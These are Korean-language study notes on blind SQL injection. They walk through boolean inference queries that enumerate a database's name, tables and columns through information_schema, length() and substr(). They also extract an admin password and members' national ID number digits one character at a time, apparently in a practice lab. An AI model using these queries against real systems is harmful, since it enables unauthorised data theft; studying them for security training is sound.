Blind Injection -1

Blind Injection

content Based

Response Based

순차 탐색

이진 탐색

Bit 연산 탐색

a가 포함돼있지않아서 FALSE = 0

SELECT substr((SELECT password FROM board.members WHERE id='admin'),1,1)='a';

@가 포함돼있어서 TRUE = 1

SELECT substr((SELECT password FROM board.members WHERE id='admin'),1,1)='@';

Blind Injection 공격의 핵심은 참/거짓을 판별하여 응답값을 받는 것

메타데이터 매핑

 

< 순차 접근 >

DB이름 목록화

Table 이름 목록화

Column 이름의 목록화

 

< 비순차 접근 >

개발자 입장에서 목록들을 유추해야한다

SELECT table_name FROM information_schema.tables WHERE schema_name='board' and table_name like '%mem%'

DATABASE 이름이 board 이면서 테이블 이름에서 %mem%인것

SELECT column_name FROM information_schema.columns WHERE table_schema='board' and table_name='members' and column_name like '%id%';

테이블 이름 member에서 id가 들어간 컬럼

 

---

블라인드 메타데이터 목록화

1. 기본정보 목록화를 통해서 반드시 데이터베이스 이름을 알아낸다.

1-1. 글자 수를 유추한다 : length()함수// 결과물 5글자

SELECT length((SELECT database()))=1;

글자수가 5글자인것을 유추 가능

1-2. 

SELECT substr((SELECT database()),1,1)='a';

글자 맨 앞글자가 b인것을 유추 가능

두번째 글자가 o인것을 유추 가능

1-2. 한글자씩 비교하여 0(거짓)이 아닌 1(참)의 값을 찾는다 : 사용함수 mid(),substr() // 결과물 board

 

2. 알아낸 데이터베이스 이름을 가지고 테이블 이름을 유추한다.

2-1. 테이블의 개수를 파악한다 : 사용함수 count(*) // 결과 2개

SELECT (SELECT count(*) FROM information_schema.tables WHERE table_schema='board')=1;

BOARD의 테이블 개수가 2개인것을 유추 가능

 

SELECT (SELECT count(*) FROM information_schema.tables WHERE table_schema='board' and table_name like '%mem%')=1;

mem이라는 단어가 들어간 테이블 이름은 1개 인것을 유추가능

2-2. 글자수를 유추한다 : 사용함수 length() // 결과 7글자

SELECT length((SELECT table_name FROM information_schema.tables WHERE table_schema='board' and table_name like '%mem%'))=1;

7글자인것을 유추 가능

2-3. 회원 테이블을 유추하여 '%mem%'을 사용 : 

QUIZ ) 회원들의 주민등록번호 앞의 두자리를 유추해라

첫번째 자리 8인것 확인

두번째 자리 1인것 확인 : admin : 81

첫번째 자리 8인것 확인

두번째 자리 6인것 확인 : gugucon : 86

SELECT password FROM members WHERE id='admin'
① SELECT (컬럼) ② FROM (테이블) ③ WHERE (조건)
실행 순서 : ② > ③ > ①

 

3. 유추한 테이블 이름을 가지고 찾고싶은 컬럼만 유추해서 찾아낸다.